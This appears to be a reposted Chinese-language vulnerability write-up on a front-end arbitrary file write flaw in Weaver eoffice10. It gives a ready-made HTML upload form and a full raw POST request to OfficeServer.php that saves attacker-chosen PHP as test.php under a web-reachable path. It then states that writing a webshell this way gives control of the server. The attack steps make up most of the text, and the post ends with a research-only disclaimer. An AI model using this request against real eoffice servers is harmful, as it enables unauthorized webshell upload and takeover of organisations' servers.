一、漏洞描述
泛微eoffice协同办公平台是一款专业的office办公的工具软件。软件支持在线多人编辑文件,并且会在第一时间收发协作需求。十分方便快捷,界面简约,布局直观清晰,操作简单,极易上手,是一款不可多得的利器。
泛微eoffice 10版本存在前台任意文件写入漏洞,攻击者可通过该漏洞上传webshell获取服务器权限。
二、漏洞复现
系统首页地址及页面显示如下
http://xx.xx.xx.xx/eoffice10/client/web/login.html
首先查看系统版本信息
版本号:http://xx.xx.xx.xx/eoffice10/version.json
确定了系统版本号之后,本地新建一个html文件,代码如下
<form method='post'action='http://xx.xx.xx.xx/eoffice10/server/public/iWebOffice2015/OfficeServer.php'enctype="multipart/form-data" ><input type="file" name="FileData"/></br></br><input type="text" name="FormData" value="1"/></br></br><button type=submit value="上传">上传</button> </form>
浏览器打开显示如下
随便上传一张图片进行抓包,然后修改请求内容如下
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1Host: xx.xx.xx.xxContent-Length: 376Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryqhUtBPRUeNb5pjitUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryqhUtBPRUeNb5pjitContent-Disposition: form-data; name="FileData"; filename="1.jpg"Content-Type: image/jpegphpinfo();------WebKitFormBoundaryqhUtBPRUeNb5pjitContent-Disposition: form-data; name="FormData"{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}------WebKitFormBoundaryqhUtBPRUeNb5pjit--
写入的文件地址如下
http://xx.xx.xx.xx/eoffice10/server/public/iWebOffice2015/Document/test.php
如果想要getshell,直接写入webshell即可。
原文始发于微信公众号(守卫者安全):泛微 eoffice10 前台任意文件写入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论